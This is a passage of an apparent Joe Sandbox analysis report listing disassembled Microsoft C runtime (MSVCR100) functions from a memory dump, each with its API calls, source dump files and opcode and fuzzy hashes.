                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfo_local_unwind4_lock_unlock_file_wsopen_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 494836370-0
                                                                                                          • Opcode ID: a3106b6d0842844554d72a7adfccb91ad6a2e660f41053f18a8a91637c9bd7e8
                                                                                                          • Instruction ID: 48108a36c0e335a3171a61889cc4fa089ebea5e6bc3b29a03d659371a177e3e1
                                                                                                          • Opcode Fuzzy Hash: a3106b6d0842844554d72a7adfccb91ad6a2e660f41053f18a8a91637c9bd7e8
                                                                                                          • Instruction Fuzzy Hash: 1911A070800309DECBC1AF78CC805AE77A5AF45264F258A12D4349B1D4EB77B980CBB6
                                                                                                          Function 6FDF0FEC Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(?,00000000,?,?,?), ref: 6FDF1007
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,00000000,?,?,?), ref: 6FDF1012
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _stricmp.MSVCR100(?,?,?,00000000,?,?,?), ref: 6FDF103F
                                                                                                          • __crtCompareStringA.MSVCR100(?,?,00001001,?,000000FF,?,000000FF,?,?,00000000,?,?,?), ref: 6FDF105F
                                                                                                          • _errno.MSVCR100(?,?,?,?,?,?,?,00000000,?,?,?), ref: 6FDF106B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$CompareString__crt_invalid_parameter_invalid_parameter_noinfo_stricmp
                                                                                                          • String ID:
                                                                                                          • API String ID: 31590308-0
                                                                                                          • Opcode ID: 92037d80e335ad98972df54530a3e83d5247083e4ca1643a5b1c37eac55df5a6
                                                                                                          • Instruction ID: 02230b134145e16b7fdfb2467538fd40839530dd12c4325e3b8c48b5f0fc395d
                                                                                                          • Opcode Fuzzy Hash: 92037d80e335ad98972df54530a3e83d5247083e4ca1643a5b1c37eac55df5a6
                                                                                                          • Instruction Fuzzy Hash: 02112BB180A389EBDF519FA4C880D9D3B71AF01339B214359E4701A1E4EB32B552EB51
                                                                                                          Function 6FDF0DF7 Relevance: 7.6, APIs: 5, Instructions: 56stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(?,00000000,?,?,?), ref: 6FDF0E12
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,00000000,?,?,?), ref: 6FDF0E1D
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • strcmp.MSVCR100(?,?,?,00000000,?,?,?), ref: 6FDF0E4A
                                                                                                          • __crtCompareStringA.MSVCR100(?,?,00001000,?,000000FF,?,000000FF,?,?,00000000,?,?,?), ref: 6FDF0E6A
                                                                                                          • _errno.MSVCR100(?,?,?,?,?,?,?,00000000,?,?,?), ref: 6FDF0E76
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$CompareString__crt_invalid_parameter_invalid_parameter_noinfostrcmp
                                                                                                          • String ID:
                                                                                                          • API String ID: 182557437-0
                                                                                                          • Opcode ID: ce5936fabace003cca8b5b5601c6c781875d8d97f6b3aa0f505b9914e22dea4a
                                                                                                          • Instruction ID: 0826a75b449febdce215869b21e5ce7fed640f462e0de23a00b8dd91d065f718
                                                                                                          • Opcode Fuzzy Hash: ce5936fabace003cca8b5b5601c6c781875d8d97f6b3aa0f505b9914e22dea4a
                                                                                                          • Instruction Fuzzy Hash: AC116A72806349EFDF519FA4CC48DAD3B60AF013B8B219359E5721B1E1EB32B592DB50
                                                                                                          Function 6FDDFE51 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(?), ref: 6FDDFE6C
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?), ref: 6FDDFE77
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _stricoll_l.MSVCR100(?,?,?,?), ref: 6FDDFEA5
                                                                                                          • __crtCompareStringA.MSVCR100(?,?,00001001,?,000000FF,?,000000FF,?,?), ref: 6FDDFEC8
                                                                                                          • _errno.MSVCR100(?,?,?,?,?,?,?), ref: 6FDDFED4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$CompareString__crt_invalid_parameter_invalid_parameter_noinfo_stricoll_l
                                                                                                          • String ID:
                                                                                                          • API String ID: 2022759639-0
                                                                                                          • Opcode ID: 3833929afc3fa68242afde968df86a9648e1139df7298521760872d16bd90eb0
                                                                                                          • Instruction ID: 0adf659a44b4e5972c59648c82c5fe1b737125df252a564ef31943bf2dca5e23
                                                                                                          • Opcode Fuzzy Hash: 3833929afc3fa68242afde968df86a9648e1139df7298521760872d16bd90eb0
                                                                                                          • Instruction Fuzzy Hash: 46115872804389EFCF51AFA8CC4089D7B71AF45338B248355F5341A1E2DB32AA95DB91
                                                                                                          Function 6FD8C84A Relevance: 7.6, APIs: 5, Instructions: 54timethreadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 6FDB079E
                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 6FDB07AA
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6FDB07B2
                                                                                                          • GetTickCount.KERNEL32 ref: 6FDB07BA
                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 6FDB07C6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                          • String ID:
                                                                                                          • API String ID: 1445889803-0
                                                                                                          • Opcode ID: bfa2daba3ecb0daed5900bcb96ba172d0cd2259aabb17cf046a2f854df7a2bf1
                                                                                                          • Instruction ID: d0c2028a35e38b497eadfe2683fe40b8aa2c535364f25f9c24ec6d874b125d98
                                                                                                          • Opcode Fuzzy Hash: bfa2daba3ecb0daed5900bcb96ba172d0cd2259aabb17cf046a2f854df7a2bf1
                                                                                                          • Instruction Fuzzy Hash: D61133B6D006249BEF109FB8C54859DF7F8EB49371F561615D915EB204EB70B9508B80
                                                                                                          Function 6FD92F10 Relevance: 7.6, APIs: 5, Instructions: 52COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • wcslen.MSVCR100(?,6FD92F60,00000010), ref: 6FD92F44
                                                                                                          • _lock_file.MSVCR100(?,?,6FD92F60,00000010), ref: 6FD92F4F
                                                                                                            • Part of subcall function 6FD8A48D: _lock.MSVCR100(?,?,?,6FDD6E10,00000040,6FDD6E48,0000000C,6FDA8676,00000000,?), ref: 6FD8A4BA
                                                                                                          • _fputwc_nolock.MSVCR100(?,?,?,?,?,?,?,?,6FD92F60,00000010), ref: 6FD92F94
                                                                                                          • _errno.MSVCR100(6FD92F60,00000010), ref: 6FDA86E9
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FD92F60,00000010), ref: 6FDA86F4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_fputwc_nolock_invalid_parameter_noinfo_lock_lock_filewcslen
                                                                                                          • String ID:
                                                                                                          • API String ID: 1101344634-0
                                                                                                          • Opcode ID: a45d2c82ba2e392afefc4bb556024c2bf56ce729a996238249332530ea55d40e
                                                                                                          • Instruction ID: 3ac5a89d352b182e7722be198f4065c0f48f7a12f762e3652c9c27136f8e772f
                                                                                                          • Opcode Fuzzy Hash: a45d2c82ba2e392afefc4bb556024c2bf56ce729a996238249332530ea55d40e
                                                                                                          • Instruction Fuzzy Hash: 88118E31909319DBDF90AFA9C8045AD77B0EF05729F10C726F8649A1D4CB39F9409BA4
                                                                                                          Function 6FDDADFD Relevance: 7.6, APIs: 5, Instructions: 52COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfo_localtime32_s_wasctime_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 453477223-0
                                                                                                          • Opcode ID: 8bbb1fcf8fd1596c519366f0f4c131c5828e207e5792350631d0db816e17d6ca
                                                                                                          • Instruction ID: 2abf25f5cc317ebd3b8af7910f150790a4b1fc64efbcd5aa5db991c2d3e96dfd
                                                                                                          • Opcode Fuzzy Hash: 8bbb1fcf8fd1596c519366f0f4c131c5828e207e5792350631d0db816e17d6ca
                                                                                                          • Instruction Fuzzy Hash: EA017171741319DBDB51BF68D805ACE77B8AF49724F05842AF4109B281EB71F940C7A5
                                                                                                          Function 6FDF85A6 Relevance: 7.6, APIs: 5, Instructions: 52COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _get_osfhandle.MSVCR100(?,?,?,?,?,?,6FDAFDE3,?,00000000,00000000,00000002,?,00000002,?,?,6FD8ECE1), ref: 6FDF85BF
                                                                                                          • _errno.MSVCR100(?,?,?,?,?,6FDAFDE3,?,00000000,00000000,00000002,?,00000002,?,?,6FD8ECE1,?), ref: 6FDF85CC
                                                                                                          • SetFilePointer.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,6FDAFDE3,?,00000000,00000000,00000002,?,00000002), ref: 6FDF85E8
                                                                                                          • GetLastError.KERNEL32(?,6FDAFDE3,?,00000000,00000000,00000002,?,00000002,?,?,6FD8ECE1,?,?,?,6FD8ED00,00000010), ref: 6FDF85F5
                                                                                                          • _dosmaperr.MSVCR100(00000000,?,6FDAFDE3,?,00000000,00000000,00000002,?,00000002,?,?,6FD8ECE1,?,?,?,6FD8ED00), ref: 6FDF8600
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorFileLastPointer_dosmaperr_errno_get_osfhandle
                                                                                                          • String ID:
                                                                                                          • API String ID: 1167104555-0
                                                                                                          • Opcode ID: 1933e6dfd7e1a931ea46f2a537fb0a0482437ff56244e28e33fed6501617a9d9
                                                                                                          • Instruction ID: 516aebaab01cc067540a4a683db2a5e780b665e647d83840e949d665d761aa3c
                                                                                                          • Opcode Fuzzy Hash: 1933e6dfd7e1a931ea46f2a537fb0a0482437ff56244e28e33fed6501617a9d9
                                                                                                          • Instruction Fuzzy Hash: D6018872A15658EFCB41CFA9CC44C8E7BB9EF46360B154255E860DB280EB70F9418B60
                                                                                                          Function 6FDD8FBC Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfo_localtime32_sasctime_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 1786148782-0
                                                                                                          • Opcode ID: 417d73162e90c0890208f00149c4a11a1880dd27e85181ef80533d40950df578
                                                                                                          • Instruction ID: dece507c95f8ec19a39f9ff7c8dfbc5851476d5f4a9b13e6373b8adbea8e3914
                                                                                                          • Opcode Fuzzy Hash: 417d73162e90c0890208f00149c4a11a1880dd27e85181ef80533d40950df578
                                                                                                          • Instruction Fuzzy Hash: 68018871505318EFDB529F68E804BDE77B8EF0A714F015116F9149B1C0EB75F94087A6
                                                                                                          Function 6FDF40AD Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _CreateFrameInfo.MSVCR100(00000000,?,6FDF4250,0000002C,6FDF4522,00000000,csm,?,?,6FDB2708,00000100,csm,00000000,?), ref: 6FDF40D5
                                                                                                            • Part of subcall function 6FD9837E: _getptd.MSVCR100 ref: 6FD9838C
                                                                                                            • Part of subcall function 6FD9837E: _getptd.MSVCR100 ref: 6FD9839A
                                                                                                          • _getptd.MSVCR100(6FDF4250,0000002C,6FDF4522,00000000,csm,?,?,6FDB2708,00000100,csm,00000000,?), ref: 6FDF40DF
                                                                                                          • _getptd.MSVCR100(6FDF4250,0000002C,6FDF4522,00000000,csm,?,?,6FDB2708,00000100,csm,00000000,?), ref: 6FDF40ED
                                                                                                          • _getptd.MSVCR100(6FDF4250,0000002C,6FDF4522,00000000,csm,?,?,6FDB2708,00000100,csm,00000000,?), ref: 6FDF40FB
                                                                                                          • _getptd.MSVCR100(6FDF4250,0000002C,6FDF4522,00000000,csm,?,?,6FDB2708,00000100,csm,00000000,?), ref: 6FDF4106
                                                                                                            • Part of subcall function 6FDF41D3: _FindAndUnlinkFrame.MSVCR100(?,6FDF41BF,?), ref: 6FDF41DC
                                                                                                            • Part of subcall function 6FDF41D3: _getptd.MSVCR100(6FDF41BF,?), ref: 6FDF41E2
                                                                                                            • Part of subcall function 6FDF41D3: _getptd.MSVCR100(6FDF41BF,?), ref: 6FDF41F0
                                                                                                            • Part of subcall function 6FDF41D3: _IsExceptionObjectToBeDestroyed.MSVCR100(?), ref: 6FDF4233
                                                                                                            • Part of subcall function 6FDF41D3: __DestructExceptionObject.MSVCR100(00000000,00000000), ref: 6FDF4241
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _getptd$ExceptionFrameObject$CreateDestroyedDestructFindInfoUnlink
                                                                                                          • String ID:
                                                                                                          • API String ID: 2613726750-0
                                                                                                          • Opcode ID: 669f1bfe73592f0821ce6d17274b394d5b52a6448de29e73143016639d208b87
                                                                                                          • Instruction ID: 3f97877d2ad1a6bf6ca7d4595f00f215854f1781f497ef4efcf043202918c822
                                                                                                          • Opcode Fuzzy Hash: 669f1bfe73592f0821ce6d17274b394d5b52a6448de29e73143016639d208b87
                                                                                                          • Instruction Fuzzy Hash: AC111C75C01309DFDF40DFA4D948B9E77B0FF04354F119069E965A7290DB38A9159F60
                                                                                                          Function 6FD80110 Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfomemcpymemset
                                                                                                          • String ID:
                                                                                                          • API String ID: 77509311-0
                                                                                                          • Opcode ID: e07c0c6c417fb1cc33f45a315b6db5ccc3e21c2603c3f501c7df04ecebc97513
                                                                                                          • Instruction ID: e7abc3cdcb10d773347b20b95eada77a9592d484122b90de1c88054541916d4c
                                                                                                          • Opcode Fuzzy Hash: e07c0c6c417fb1cc33f45a315b6db5ccc3e21c2603c3f501c7df04ecebc97513
                                                                                                          • Instruction Fuzzy Hash: AA018F72545318EBCFA25F14EC09BCA3B65AF04BA8F008526F8285A1E4D773B590CAD6
                                                                                                          Function 6FDC0EE7 Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 6FDC0F18
                                                                                                          • GetLastError.KERNEL32 ref: 6FDC0F1F
                                                                                                          • ??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z.MSVCR100(00000000), ref: 6FDC0F38
                                                                                                          • _CxxThrowException.MSVCR100(00000000,6FE20C48,00000000), ref: 6FDC0F47
                                                                                                          • CloseHandle.KERNEL32(?), ref: 6FDC0F4F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ??0scheduler_resource_allocation_error@CloseConcurrency@@ErrorExceptionHandleLastMultipleObjectsThrowWait
                                                                                                          • String ID:
                                                                                                          • API String ID: 3700427873-0
                                                                                                          • Opcode ID: 5f4afd8a8bfa25ef61cf01b4e099f3a00729c9bf269a300c59dd3f0289e1abc3
                                                                                                          • Instruction ID: 1f989ca360f34edc52731a78c519c2846dc83cd23554714b0b405aecd12aebce
                                                                                                          • Opcode Fuzzy Hash: 5f4afd8a8bfa25ef61cf01b4e099f3a00729c9bf269a300c59dd3f0289e1abc3
                                                                                                          • Instruction Fuzzy Hash: C80149B2448705ABD7909B24CC48F1A77ACAF413B0F248725F8B4C71D0EB34F9919666
                                                                                                          Function 6FD8A80F Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _fileno.MSVCR100(?,?,?), ref: 6FD8A839
                                                                                                          • _close.MSVCR100(00000000,?,?,?), ref: 6FD8A83F
                                                                                                          • _errno.MSVCR100 ref: 6FDA8B94
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDA8B9F
                                                                                                            • Part of subcall function 6FD8A595: _fileno.MSVCR100(?,?,?,?,?,?,?,6FD8A830,?), ref: 6FD8A5C4
                                                                                                            • Part of subcall function 6FD8A595: _write.MSVCR100(00000000,?,?,?,?,?,?,6FD8A830,?), ref: 6FD8A5CB
                                                                                                            • Part of subcall function 6FD8A7DE: free.MSVCR100(?,?,?,6FD8A838,?,?), ref: 6FD8A7F5
                                                                                                          • free.MSVCR100(?), ref: 6FDA8BB4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _filenofree$_close_errno_invalid_parameter_noinfo_write
                                                                                                          • String ID:
                                                                                                          • API String ID: 3709965489-0
                                                                                                          • Opcode ID: 4d11a22a5687fa657dc88992964cc0f3a3af2764d99355c45d40b5b2b8714fdb
                                                                                                          • Instruction ID: f3442dc325f471fa6addd7e91f22b96cdb58cb760710b3069a71d745c8eff57c
                                                                                                          • Opcode Fuzzy Hash: 4d11a22a5687fa657dc88992964cc0f3a3af2764d99355c45d40b5b2b8714fdb
                                                                                                          • Instruction Fuzzy Hash: BBF0FF72902B10BAD2901B3A8C08B8B77A85F82379F044729ED79970C0EB78F00286B0
                                                                                                          Function 6FD8AA39 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • DecodePointer.KERNEL32(?,?,?,?,?,6FD8AA03,?,6FD8AA20,0000000C,6FD8C551,?,?,6FD8C455,6FDA70E0,?,6FD8B911), ref: 6FD8AA51
                                                                                                          • DecodePointer.KERNEL32(?,?,?,?,?,6FD8AA03,?,6FD8AA20,0000000C,6FD8C551,?,?,6FD8C455,6FDA70E0,?,6FD8B911), ref: 6FD8AA5E
                                                                                                          • _msize.MSVCR100(00000000,?,?,?,?,?,6FD8AA03,?,6FD8AA20,0000000C,6FD8C551,?,?,6FD8C455,6FDA70E0), ref: 6FD8AA7B
                                                                                                            • Part of subcall function 6FD825DA: HeapSize.KERNEL32(00000000,00000000,?,6FD8AA80,00000000,?,?,?,?,?,6FD8AA03,?,6FD8AA20,0000000C,6FD8C551,?), ref: 6FD825F4
                                                                                                          • EncodePointer.KERNEL32(?,?,?,?,?,?,6FD8AA03,?,6FD8AA20,0000000C,6FD8C551,?,?,6FD8C455,6FDA70E0), ref: 6FD8AA97
                                                                                                          • EncodePointer.KERNEL32(-00000004,?,?,?,?,?,6FD8AA03,?,6FD8AA20,0000000C,6FD8C551,?,?,6FD8C455,6FDA70E0), ref: 6FD8AA9F
                                                                                                          • _realloc_crt.MSVCR100(00000000,00000800,?,?,?,?,?,6FD8AA03,?,6FD8AA20,0000000C,6FD8C551,?,?,6FD8C455,6FDA70E0), ref: 6FD9283A
                                                                                                          • EncodePointer.KERNEL32(00000000,?,?,?,?,?,6FD8AA03,?,6FD8AA20,0000000C,6FD8C551,?,?,6FD8C455,6FDA70E0), ref: 6FD92850
                                                                                                          Memory Dump Source
